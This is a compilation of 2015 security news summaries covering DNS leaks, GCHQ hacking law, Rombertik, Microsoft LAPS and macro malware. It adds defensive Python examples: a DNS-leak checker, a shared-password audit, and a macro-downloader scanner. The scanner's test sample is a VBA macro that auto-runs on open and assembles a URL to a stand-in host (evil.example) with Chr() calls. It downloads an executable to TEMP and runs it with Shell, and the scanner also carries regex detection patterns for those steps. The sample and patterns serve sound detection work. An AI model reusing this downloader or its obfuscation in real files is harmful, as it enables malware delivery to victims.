Find out if you are affected by DNS Leaks

May 19, 2015 – 4:38 AM

Whenever you use anonymity or privacy solutions to protect your Internet traffic from being snooped on, or to bypass censorship and location-based restrictions, you need to make sure that data about your actual location or the underlying system does not leak outside the protected channel.

A recent example is WebRTC, a technology that most modern browsers now support. When it is enabled, websites and services can use WebRTC to discover your computer's IP addresses, including addresses the VPN was supposed to hide, even if you use a VPN service.

Computers use DNS to translate domain names to IP addresses. When you enter a domain name in the browser, a DNS lookup returns the corresponding IP address, and the browser connects to it.

Most systems use their Internet Service Provider's DNS server by default, but the resolver can be changed to a third-party provider such as OpenDNS or Google DNS, which promise faster lookups and may offer advanced features such as filtering of malicious sites.

A DNS leak occurs when lookups are still sent to the ISP's DNS server, outside the tunnel, while you are connected to a virtual private network or another anonymity or privacy solution. The traffic itself is protected, but whoever operates or observes that resolver still sees every domain you resolve, which reveals both your real network and your browsing.
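One way to check for this leak from the host's own configuration, as an added example that is not part of the ghacks article: the script parses a resolv.conf-style resolver list and a routing table, does a longest-prefix-match lookup for each resolver, and reports every resolver whose queries would exit through an interface other than the VPN tunnel. The resolver file, the routing table and the interface name tun0 are constructed assumptions; on Linux you would substitute the contents of /etc/resolv.conf and the routes shown by `ip route` and `ip -6 route`.

```python
import ipaddress

# Constructed sample: resolv.conf as a VPN client might leave it, with the
# VPN's resolver added but the LAN router, a public resolver and an IPv6
# resolver still configured.
SAMPLE_RESOLV_CONF = """\
# Generated by NetworkManager
search example.lan
nameserver 10.8.0.1
nameserver 192.168.1.1
nameserver 8.8.8.8
nameserver 2001:db8::53
options timeout:2
"""

# Constructed sample routing table as (destination prefix, exit interface),
# the information `ip route` / `ip -6 route` would give on Linux. Only the
# tunnel subnet goes through tun0; the IPv4 and IPv6 default routes still
# exit on the ISP-facing eth0.
SAMPLE_ROUTES = [
    ("0.0.0.0/0", "eth0"),
    ("192.168.1.0/24", "eth0"),
    ("10.8.0.0/24", "tun0"),
    ("::/0", "eth0"),
]

TUNNEL_IFACE = "tun0"  # assumption: the VPN client's interface name


def parse_resolv_conf(text):
    """Return the nameserver addresses from resolv.conf-style text, in order."""
    servers = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            # Strip a link-local scope id such as fe80::1%eth0 so ipaddress can parse it.
            servers.append(parts[1].split("%", 1)[0])
    return servers


def route_for(address, routes):
    """Longest-prefix match over `routes`: return (prefix, iface) for the route
    that carries traffic to `address`, or None if nothing matches."""
    addr = ipaddress.ip_address(address)
    best = None
    for prefix, iface in routes:
        net = ipaddress.ip_network(prefix, strict=False)
        if net.version != addr.version or addr not in net:
            continue
        if best is None or net.prefixlen > best[0].prefixlen:
            best = (net, iface)
    return None if best is None else (str(best[0]), best[1])


def find_dns_leaks(resolv_text, routes, tunnel_iface):
    """Return (nameserver, exit_iface) for each configured resolver that is
    reached over an interface other than the tunnel. A resolver with no route
    at all is reported with exit_iface None, since it cannot be tunnelled."""
    leaks = []
    for server in parse_resolv_conf(resolv_text):
        match = route_for(server, routes)
        iface = None if match is None else match[1]
        if iface != tunnel_iface:
            leaks.append((server, iface))
    return leaks


if __name__ == "__main__":
    leaks = find_dns_leaks(SAMPLE_RESOLV_CONF, SAMPLE_ROUTES, TUNNEL_IFACE)
    for server, iface in leaks:
        path = "has no route" if iface is None else f"exits via {iface}"
        print(f"LEAK: DNS queries to {server} {path}, not via {TUNNEL_IFACE}")
    if not leaks:
        print(f"All configured resolvers are reached via {TUNNEL_IFACE}")
```

The IPv6 resolver is the case practitioners most often miss: a VPN client that only tunnels IPv4 leaves the ::/0 route on the native interface, so IPv6 lookups bypass the tunnel even when every IPv4 resolver is handled correctly. Note also that the check looks at the path, not the resolver's owner: 8.8.8.8 reached through eth0 still leaks your queries to the ISP's network path.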

Source:
http://www.ghacks.net/2015/05/19/find-out-if-you-are-affected-by-dns-leaks/

UK Government Rewrites Laws to Let GCHQ Hack Into Computers Legally

May 17, 2015 – 9:12 AM

The UK Government has quietly changed its anti-hacking laws to exempt GCHQ, police and other electronic intelligence agencies from criminal prosecution for hacking into computers and mobile phones and for carrying out their controversial surveillance practices.

The details of the changes were disclosed at the Investigatory Powers Tribunal, which is currently hearing a challenge to the legality of computer hacking by UK law enforcement and its intelligence agencies.

About a year ago, a coalition of Internet service providers teamed up with Privacy International to take legal action against GCHQ over what they argued were unlawful hacking activities.

However, two months ago the Government amended the Computer Misuse Act (CMA) to give GCHQ and other intelligence agencies more protection, through a little-noticed addition to the Serious Crime Bill.

The change was introduced on June 6, 2014, just weeks after Privacy International filed its complaint that GCHQ's computer hacking to gather intelligence was unlawful under the CMA.

The bill, which allows GCHQ and other intelligence officers to hack without any criminal liability, was passed into law on March 3, 2015 and came into force on May 3, 2015.

Source:
http://thehackernews.com/2015/05/anti-hacking-law.html


Super secretive malware wipes hard drive to prevent analysis

May 4, 2015 – 7:48 PM

Researchers have uncovered new malware that takes extraordinary measures to evade detection and analysis, including deleting all hard drive data and rendering a computer inoperable.

Rombertik, as the malware has been dubbed by researchers from Cisco Systems’ Talos Group, is a complex piece of software that indiscriminately collects everything a user does on the Web, presumably to obtain login credentials and other sensitive data. It gets installed when people click on attachments included in malicious e-mails.

Talos researchers reverse engineered the software and found that behind the scenes Rombertik takes a variety of steps to evade analysis. It contains multiple levels of obfuscation and anti-analysis functions that make it hard for outsiders to peer into its inner workings. And when its main yfoye.exe component detects that the malware is under the microscope of a security researcher or a rival malware writer, Rombertik self-destructs, taking the contents of the victim’s hard drive along with it.

Source:
http://arstechnica.com/security/2015/05/04/super-secretive-malware-wipes-hard-drive-to-prevent-analysis/

Local Administrator Password Solution (LAPS) Now Available

May 1, 2015 – 5:36 PM

Microsoft is offering the Local Administrator Password Solution (LAPS), which addresses the problem of using a common local account with an identical password on every computer in a domain. LAPS sets a different, random password for the common local administrator account on every domain-joined computer and stores it in Active Directory, where domain administrators can determine which users, such as helpdesk administrators, are authorized to read it.

If those identical local account credentials are compromised, an attacker can use them to elevate from a local user or local administrator to a domain or enterprise administrator. Local administrator credentials are still needed for occasions when logon is required without domain access, but in large environments managing them becomes complex, leading to poor security practices, and such environments greatly increase the risk of a Pass-the-Hash (PtH) credential replay attack.

LAPS simplifies password management while helping customers implement recommended defenses against cyberattacks. In particular, the solution mitigates the risk of lateral movement and escalation that results when customers use the same local administrative account and password combination on their computers.
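The two halves of the problem the advisory describes, the exposure created by one shared local administrator credential and the per-host random password that LAPS replaces it with, as an added Python example that is neither Microsoft's code nor part of the advisory. The host-to-hash mapping is constructed (made-up hex values, not real NT hashes), and the 14-character, four-character-class policy is an assumption standing in for whatever a LAPS deployment is configured to enforce.

```python
import secrets
import string
from collections import defaultdict

# Constructed sample: the local Administrator NT hash as a credential audit
# might collect it from each host (made-up hex, not real hashes). Before
# LAPS, an image-deployed fleet typically shows the same hash on most hosts.
SAMPLE_LOCAL_ADMIN_HASHES = {
    "WS-001": "2b576acbe6bcfda7294d6bd18041b8fe",
    "WS-002": "2b576acbe6bcfda7294d6bd18041b8fe",
    "WS-003": "2b576acbe6bcfda7294d6bd18041b8fe",
    "WS-004": "c8bd3f6e9a2a5d4c1e7f0b9a8d6c5e4f",
    "SRV-DB1": "2b576acbe6bcfda7294d6bd18041b8fe",
    "SRV-WEB1": "c8bd3f6e9a2a5d4c1e7f0b9a8d6c5e4f",
    "SRV-FS1": "7a1d9e4b0c3f2a6e8b5d1c0f9e7a3b2d",
}

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
SPECIAL = "!#$%&()*+,-./:;<=>?@[]^_{|}~"  # assumption: the allowed special characters
ALPHABET = UPPER + LOWER + DIGITS + SPECIAL


def shared_credential_groups(host_hashes):
    """Group hosts whose local admin hash is identical. Each group is the set of
    machines one captured hash unlocks via pass-the-hash; largest group first."""
    by_hash = defaultdict(list)
    for host, nt_hash in host_hashes.items():
        by_hash[nt_hash.lower()].append(host)
    groups = [sorted(hosts) for hosts in by_hash.values() if len(hosts) > 1]
    return sorted(groups, key=lambda g: (-len(g), g))


def lateral_exposure(host_hashes):
    """Number of ordered (source, target) host pairs reachable with a reused hash."""
    return sum(len(g) * (len(g) - 1) for g in shared_credential_groups(host_hashes))


def meets_complexity(password, min_length=14):
    """Windows-style complexity: minimum length plus one of each character class."""
    return (len(password) >= min_length
            and any(c in UPPER for c in password)
            and any(c in LOWER for c in password)
            and any(c in DIGITS for c in password)
            and any(c in SPECIAL for c in password))


def generate_local_admin_password(length=14):
    """Random password from the OS CSPRNG that satisfies meets_complexity():
    one guaranteed character per class, the rest from the full alphabet, then
    shuffled so the guaranteed characters do not sit at fixed positions."""
    if length < 4:
        raise ValueError("length must allow one character of each class")
    chars = [secrets.choice(UPPER), secrets.choice(LOWER),
             secrets.choice(DIGITS), secrets.choice(SPECIAL)]
    chars += [secrets.choice(ALPHABET) for _ in range(length - 4)]
    for i in range(len(chars) - 1, 0, -1):  # Fisher-Yates with a CSPRNG
        j = secrets.randbelow(i + 1)
        chars[i], chars[j] = chars[j], chars[i]
    return "".join(chars)


def assign_unique_passwords(hosts, length=14):
    """Per-host random passwords, as LAPS sets them: returns {host: password}
    and guarantees no two hosts share one."""
    passwords, seen = {}, set()
    for host in hosts:
        pw = generate_local_admin_password(length)
        while pw in seen:  # practically impossible at 14 characters, but cheap to guard
            pw = generate_local_admin_password(length)
        seen.add(pw)
        passwords[host] = pw
    return passwords


if __name__ == "__main__":
    for group in shared_credential_groups(SAMPLE_LOCAL_ADMIN_HASHES):
        print(f"shared local admin hash across {len(group)} hosts: {', '.join(group)}")
    print(f"host pairs reachable by pass-the-hash: {lateral_exposure(SAMPLE_LOCAL_ADMIN_HASHES)}")
    rotated = assign_unique_passwords(SAMPLE_LOCAL_ADMIN_HASHES)
    print(f"after per-host rotation: {lateral_exposure({h: p for h, p in rotated.items()})} pairs")
```

The audit half is what you would run against a hash dump from your own fleet before rolling out LAPS; the generation half shows why the solution works, since with a unique random value per host a captured hash is good for exactly one machine. In a real deployment the password is set and stored by the LAPS client-side extension and read back from Active Directory by the principals you delegate, not generated by a script like this.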

Source:
https://technet.microsoft.com/en-us/library/security/3062591

Macro Malware Returns with a Vengeance, Infecting Half a Million PCs

April 30, 2015 – 9:07 PM

Macro malware, that tried-and-true document-borne attack vector, is back. Over the past few months, Microsoft has seen a growing trend of macro downloaders that has affected nearly 501,240 unique machines worldwide.

The majority of the macro-malware attacks have taken place in the United States and United Kingdom.

Macro malware gets into your PC as a spam email attachment. The user opens the document and enables macros, believing the document needs them to display properly, and in doing so unknowingly allows the malicious macro to run.

Success of course requires the email recipient to fall for the social engineering, open the attachment and enable macros.

“The macro malware-laden documents that target email users through email spam are intentionally crafted to pique any person’s curiosity,” explained the Microsoft Malware Protection Center, in a blog. “With subjects that include sales invoices, federal tax payments, courier notifications, resumes and donation confirmations, users can be easily tricked to read the email and open the attachment without thinking twice.”

Essentially, macro downloaders serve as the gateway for other nasty malware to get in. “When a malicious macro code runs, it either downloads its final payload, or it downloads another payload courier in the form of a binary downloader,” Microsoft added. “After the macro malware is downloaded, the job is pretty much done. The torch is passed to either the final payload or the binary downloader.”
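A scanner for the behaviour the Microsoft quotes describe (an auto-execute entry point that fetches a binary and hands off to it, with the URL assembled piecewise so it does not appear as a plain string), as an added example rather than Microsoft's tooling. The VBA module it scans is constructed for the example and is not real malware; the indicator list and weights are this example's own assumptions. Extracting the VBA text from an Office file is a separate step, which tools such as olevba perform.

```python
import re

# Constructed sample VBA, written to exercise the scanner: the classic
# macro-downloader pattern (auto-exec, HTTP fetch to %TEMP%, Shell) with the
# URL built from Chr() calls. Not real malware code.
SAMPLE_VBA = r'''
Private Sub Document_Open()
    Dim u As String, p As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & "evil.example" & "/inv.exe"
    p = Environ("TEMP") & "\inv.exe"
    Set x = CreateObject("MSXML2.XMLHTTP")
    x.Open "GET", u, False
    x.Send
    Set s = CreateObject("ADODB.Stream")
    s.Open: s.Type = 1: s.Write x.responseBody: s.SaveToFile p, 2
    Shell p, vbHide
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_VBA = r'''
Sub FormatReport()
    ActiveSheet.Range("A1").Font.Bold = True
End Sub
'''

# (name, pattern, weight): the behaviours of a macro downloader. Weights are
# assumptions chosen for this example, not a published scoring scheme.
INDICATORS = [
    ("auto-exec trigger", r"\b(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open)\b", 2),
    ("HTTP download", r"MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest|URLDownloadToFile", 2),
    ("process execution", r"\bShell\b|Win32_Process", 2),
    ("PowerShell", r"powershell|-EncodedCommand", 2),
    ("file write", r"ADODB\.Stream|\bSaveToFile\b|\bPut\s+#", 1),
    ("temp/appdata path", r'Environ\s*\(\s*"(TEMP|TMP|APPDATA)"\s*\)', 1),
    ("string obfuscation", r"\bChr[WB]?\s*\(|\bStrReverse\s*\(", 1),
]


def deobfuscate(vba):
    """Fold Chr(n) calls into literal characters and join adjacent string
    literals, so a URL assembled piecewise becomes a single visible string."""
    def chr_to_literal(m):
        ch = chr(int(m.group(1)))
        return '"' + ('""' if ch == '"' else ch) + '"'  # VBA doubles an embedded quote
    folded = re.sub(r"\bChr[WB]?\s*\(\s*(\d+)\s*\)", chr_to_literal, vba, flags=re.I)
    return re.sub(r'"\s*&\s*"', "", folded)  # "abc" & "def" -> "abcdef"


def extract_urls(text):
    """URLs present in (deobfuscated) macro text."""
    return re.findall(r"https?://[^\s\"']+", text)


def scan_macro(vba):
    """Match INDICATORS against both the raw and deobfuscated source (an
    indicator name may itself be hidden behind Chr()), score them, pull out
    URLs and return a verdict."""
    text = deobfuscate(vba)
    hits = [name for name, pattern, _ in INDICATORS
            if re.search(pattern, vba, re.I) or re.search(pattern, text, re.I)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    urls = extract_urls(text)
    if "auto-exec trigger" in hits and ("HTTP download" in hits or "PowerShell" in hits) and score >= 5:
        verdict = "likely macro downloader"
    elif score >= 3:
        verdict = "suspicious"
    else:
        verdict = "no downloader indicators"
    return {"indicators": hits, "score": score, "urls": urls, "verdict": verdict}


if __name__ == "__main__":
    for label, module in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        result = scan_macro(module)
        print(f"{label}: {result['verdict']} (score {result['score']})")
        print(f"  indicators: {', '.join(result['indicators']) or 'none'}")
        print(f"  urls: {', '.join(result['urls']) or 'none'}")
```

The deobfuscation step is the part worth keeping: the "torch is passed" to a second-stage URL or binary downloader, and that URL is exactly what the macro author hides behind Chr() concatenation, so folding it back gives you the indicator to block before anything else. The verdict logic keys on the combination the quotes describe (an auto-execute entry point plus a fetch), not on any single call, because Environ("TEMP") or Shell alone appear in plenty of legitimate automation.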

Source:
http://www.infosecurity-magazine.com/news/macro-malware-returns-with-a/